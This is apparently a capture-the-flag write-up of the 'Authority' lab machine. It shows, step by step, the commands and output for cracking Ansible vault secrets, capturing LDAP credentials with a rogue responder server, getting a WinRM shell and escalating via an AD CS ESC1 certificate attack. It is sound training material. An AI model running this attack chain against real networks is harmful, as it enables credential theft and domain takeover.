Authority
Table of Contents
Introduction
The authority machine required us to enumerate the host in order to discover an accessible SMB share containing Ansible secrets and a service operating on port 8443. By deciphering the Ansible key and decrypting the secrets, we gained access to the admin manager interface of the service running on port 8443. Through configuring the service to connect to a rogue LDAP service, we could retrieve plaintext credentials. Using this information, we established a shell on the host machine via WinRM. Further enumeration allowed us to identify a vulnerable certificate template, exploiting which, we executed an ECS1 attack, granting us administrator privileges.
Recon
nmap (TCP all ports)
By scanning all ports nmap finds the following:
$ sudo nmap -Pn -p- authority.htb
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-16 04:15 EDT
Nmap scan report for 10.129.10.238
Host is up (0.048s latency).
Not shown: 65506 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
8443/tcp open https-alt
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49686/tcp open unknown
49687/tcp open unknown
49689/tcp open unknown
49690/tcp open unknown
49699/tcp open unknown
49710/tcp open unknown
61496/tcp open unknown
63845/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 60.97 seconds
$
nmap (found TCP ports exploration)
An in depth scan in each found port, find the following:
$ sudo nmap -Pn -sCV 10.129.10.238 -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,8443,9389,47001
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-16 04:27 EDT
Nmap scan report for 10.129.10.238
Host is up (0.054s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-16 12:27:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-07-16T12:28:36+00:00; +3h59m57s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-07-16T12:28:36+00:00; +3h59m57s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
8443/tcp open ssl/https-alt
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2023-07-14T03:07:18
|_Not valid after: 2025-07-15T14:45:42
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.1 200
| Content-Type: text/html;charset=ISO-8859-1
| Content-Length: 82
| Date: Sun, 16 Jul 2023 12:27:33 GMT
| Connection: close
| <html><head><meta http-equiv="refresh" content="0;URL='/pwm'"/></head></html>
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET, HEAD, POST, OPTIONS
| Content-Length: 0
| Date: Sun, 16 Jul 2023 12:27:33 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1936
| Date: Sun, 16 Jul 2023 12:27:39 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP/1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-07-16T12:28:09
|_ start_date: N/A
|_clock-skew: mean: 3h59m56s, deviation: 0s, median: 3h59m56s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.73 seconds
$
HTTP - TCP 80
By taking a look at the service on port 80 we find that it’s just a default page for a Microsoft IIS server:
HTTPS-Alt - TCP 8443
By taking a look at the port 8443 we find some interesting service being run:
By taking a deeper look we can find that the service being run is the pwm project and that the version is 2.0.3:
Although we now know what’s being run, the service doesn’t seem to be vulnerable and we don’t have access to further features due to an authentication requirement.
Shell as svc_ldap
SMB
By taking a look at the SMB service on the machine we find that we are able to login as an Anonymous user:
$ smbclient -N -L \\\\10.129.10.238\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Department Shares Disk
Development Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
$
We also have access to the share Development, with this in mind we get the contents of this share as follows:
$ smbclient -N \\\\10.129.10.238\\Development
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 17 09:20:38 2023
.. D 0 Fri Mar 17 09:20:38 2023
Automation D 0 Fri Mar 17 09:20:40 2023
5888511 blocks of size 4096. 1336145 blocks available
smb: \> cd Automation\
smb: \Automation\> ls
. D 0 Fri Mar 17 09:20:40 2023
.. D 0 Fri Mar 17 09:20:40 2023
Ansible D 0 Fri Mar 17 09:20:50 2023
5888511 blocks of size 4096. 1336145 blocks available
smb: \Automation\> cd Ansible\
smb: \Automation\Ansible\> ls
. D 0 Fri Mar 17 09:20:50 2023
.. D 0 Fri Mar 17 09:20:50 2023
ADCS D 0 Fri Mar 17 09:20:48 2023
LDAP D 0 Fri Mar 17 09:20:48 2023
PWM D 0 Fri Mar 17 09:20:48 2023
SHARE D 0 Fri Mar 17 09:20:48 2023
5888511 blocks of size 4096. 1336145 blocks available
smb: \Automation\Ansible> cd ..
smb: \Automation\> recurse ON
smb: \Automation\> prompt OFF
smb: \Automation\> mask ""
smb: \Automation\> mget *
getting file \Automation\Ansible\ADCS\.ansible-lint of size 259 as Ansible/ADCS/.ansible-lint (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)
<SNIP>
getting file \Automation\Ansible\ADCS\molecule\default\prepare.yml of size 371 as Ansible/ADCS/molecule/default/prepare.yml (1.8 KiloBytes/sec) (average 7.6 KiloBytes/sec)
smb: \Automation\>
Ansible Vault
Saved Secrets
Within the contents of the Development Share there was a main.yml file with an Ansible vault’s content which provided us with credential hashes:
$ cat Ansible/PWM/defaults/main.yml
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"
pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true
pwm_require_ssl: false
pwm_admin_login: !vault |
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
pwm_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764 $
Crack Vault Key
To crack the vault key we will be using the tool ansible2john to convert those secrets to a crackable john format:
$ ansible2john vault >> vault.in
The result should be of the format:
vault:$ansible$0*0*2fe48d56e7e16f71c18abd22085f39f4fb11a2b9a456cf4b72ec825fc5b9809d*e041732f9243ba0484f582d9cb20e148*4d1741fd34446a95e647c3fb4a4f9e4400eae9dd25d734abba49403c42bc2cd8
Now with this crackable we can point the tool john to it and start cracking the hash:
$ john vault.in --wordlist=/usr/share/wordlists/rockyou.txt
If all goes well we should have the following plaintext:
$ john vault.in --show
vault:!@#$%^&*
3 password hashes cracked, 0 left
$
Decrypt Secrets
Now that we know the vault key we can just use the tool ansible-vault to decrypt each key and retrieve the plaintext as follows:
$ echo '$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438' | ansible-vault decrypt
Vault password:
Decryption successful
svc_pwm
$ echo '$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531' | ansible-vault decrypt
Vault password:
Decryption successful
pWm_@dm!N_!23
$ echo '$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764' | ansible-vault decrypt
Vault password:
Decryption successful
DevT3st@123
$
Found Credentials
With this we are able to retrieve the following credentials:
svc_pwm:pWm_@dm!N_!23
admin:DevT3st@123
PWM
By trying to use the credentials found on the configuration manager login page we are able to login onto the service:
Misconfigured Service
By taking a look at the service we can see that the ldap configuration isn’t working:
Fix the service configuration
The service as the ldap component not configured correctly, to fix this we can configure as follows:
Now if we test the ldap connection we should retrieve the following:
This tells us that we can indeed connect to an ldap service with the pwm project.
Evil ldap
Now that we know that the service can make connections to ldap we can make some assumptions, one that the service must have a way to authenticate and most likely is with a set of credentials and two that the service will authenticate with the configured target host. This leads us to believe that if we configure a rogue ldap service and try to connect to it with the pwm project the service will give the credentials needed to our rogue ldap.
To test this we firstly create a rogue ldap service with the help of the tool responder:
$ sudo responder -I tun0 -A
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [OFF]
NBT-NS [OFF]
MDNS [OFF]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [ON]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.15.92]
Responder IPv6 [dead:beef:2::115a]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-R1C5MF173PF]
Responder Domain Name [I7QR.LOCAL]
Responder DCE-RPC Port [47342]
[+] Listening for events...
After our responder is running we just need to configure the target ldap host:
Now if we test the ldap profile our responder will receive an authentication request:
[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[LDAP] Cleartext Client : 10.129.10.0
[LDAP] Cleartext Username : CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
[LDAP] Cleartext Password : lDaP_1n_th3_cle4r!
[*] Skipping previously captured cleartext password for CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
[+] Exiting...
As we can see the request was sent and the responder made a response requesting the credentials needed, enabling us to retrieve the plaintext credentials from the host.
Found Credentials
With this we are able to retrieve the following credentials:
svc_ldap:lDaP_1n_th3_cle4r!
Winrm shell
Now that we have a set of credentials we can try to take advantage of the fact that the winrm port is open to try to login and retrieve a powershell shell
$ evil-winrm -i authority.htb -u svc_ldap -p lDaP_1n_th3_cle4r! -s . -e .
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> whoami
htb\svc_ldap
*Evil-WinRM* PS C:\Users\svc_ldap\Documents>
Shell as administrator
By checking our privileges within the host machine we are quick to realize that we don’t have many:
*Evil-WinRM* PS C:\Users\svc_ldap> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_ldap>
But by enumerating the host a bit we can find a weird directory within the system, this one being the Certs directory:
*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/23/2023 6:16 PM Certs
d----- 3/28/2023 1:59 PM Department Shares
d----- 3/17/2023 9:20 AM Development
d----- 8/9/2022 7:00 PM inetpub
d----- 3/24/2023 8:22 PM PerfLogs
d-r--- 3/25/2023 1:20 AM Program Files
d----- 3/25/2023 1:19 AM Program Files (x86)
d----- 4/23/2023 6:23 PM pwm
d-r--- 3/24/2023 11:27 PM Users
d----- 7/12/2023 1:19 PM Windows
-a---- 8/10/2022 8:44 PM 84784749 pwm-onejar-2.0.3.jar
*Evil-WinRM* PS C:\>
ECS1 attack
Certificate are a pivotal key component on an AD environment, one way to enumerate and abuse misconfigurations in Active Directory Certificate Services is by running the tool Certify:
*Evil-WinRM* PS C:\Users\svc_ldap> ./Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=authority,DC=htb'
[*] Listing info about the Enterprise CA 'AUTHORITY-CA'
Enterprise CA Name : AUTHORITY-CA
DNS Hostname : authority.authority.htb
FullName : authority.authority.htb\AUTHORITY-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=AUTHORITY-CA, DC=authority, DC=htb
Cert Thumbprint : 42A80DC79DD9CE76D032080B2F8B172BC29B0182
Cert Serial : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
Cert Start Date : 4/23/2023 9:46:26 PM
Cert End Date : 4/23/2123 9:56:25 PM
Cert Chain : CN=AUTHORITY-CA,DC=authority,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
Allow ManageCA, ManageCertificates HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : authority.authority.htb\AUTHORITY-CA
Template Name : CorpVPN
Schema Version : 2
Validity Period : 20 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT_CHECK_USER_DS_CERTIFICATE
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Document Signing, Encrypting File System, IP security IKE intermediate, IP security user, KDC Authentication, Secure Email
mspki-certificate-application-policy : Client Authentication, Document Signing, Encrypting File System, IP security IKE intermediate, IP security user, KDC Authentication, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Domain Computers S-1-5-21-622327497-3269355298-2248959698-515
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
Object Control Permissions
Owner : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
WriteOwner Principals : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
WriteDacl Principals : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
WriteProperty Principals : HTB\Administrator S-1-5-21-622327497-3269355298-2248959698-500
HTB\Domain Admins S-1-5-21-622327497-3269355298-2248959698-512
HTB\Enterprise Admins S-1-5-21-622327497-3269355298-2248959698-519
Certify completed in 00:00:09.1681935
*Evil-WinRM* PS C:\Users\svc_ldap>
With this we find that the certificate CorpVPN is present and vulnerable to an ESC1 attack.
To take advantage of this vulnerability we will first add a computer to the domain:
$ impacket-addcomputer authority.htb/svc_ldap:'lDaP_1n_th3_cle4r!' -computer-name HI1$ -computer-pass 123456
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Successfully added machine account HI1$ with password 123456.
$
After adding the computer we will request a certificate as the newly created machine account:
$ certipy req -u 'HI1$' -p '123456' -ca AUTHORITY-CA -target authority.htb -template CorpVPN -upn [email protected] -dns authority.authority.htb -dc-ip 10.129.9.248
Certipy v4.5.1 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 3
[*] Got certificate with multiple identifications
UPN: '[email protected]'
DNS Host Name: 'authority.authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_authority.pfx'
$
After retrieving the certificate we generate two new certificates, one without a private key and another without including the certificate.
$ certipy cert -pfx administrator_authority.pfx -nokey -out user.crt
Certipy v4.5.1 - by Oliver Lyak (ly4k)
[*] Writing certificate and to 'user.crt'
$ certipy cert -pfx administrator_authority.pfx -nocert -out user.key
Certipy v4.5.1 - by Oliver Lyak (ly4k)
[*] Writing private key to 'user.key'
$
Now, using the passthecert.py tool, we can authenticate to the ldap server using the certificates, adding therefore our user to the administrators group:
$ python3 passthecert.py -action ldap-shell -crt user.crt -key user.key -domain authority.htb -dc-ip 10.129.9.248
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
add_user_to_group svc_ldap Administrators
Type help for list of commands
# add_user_to_group svc_ldap Administrators
Adding user: svc_ldap to group Administrators result: OK
# Bye!
Now what remains for us to due is check our permissions and we will see that we have indeed administrator access:
*Evil-WinRM* PS C:\Users\svc_ldap> net user svc_ldap
User name svc_ldap
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/10/2022 9:29:31 PM
Password expires Never
Password changeable 8/11/2022 9:29:31 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/5/2023 8:43:09 PM
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc_ldap>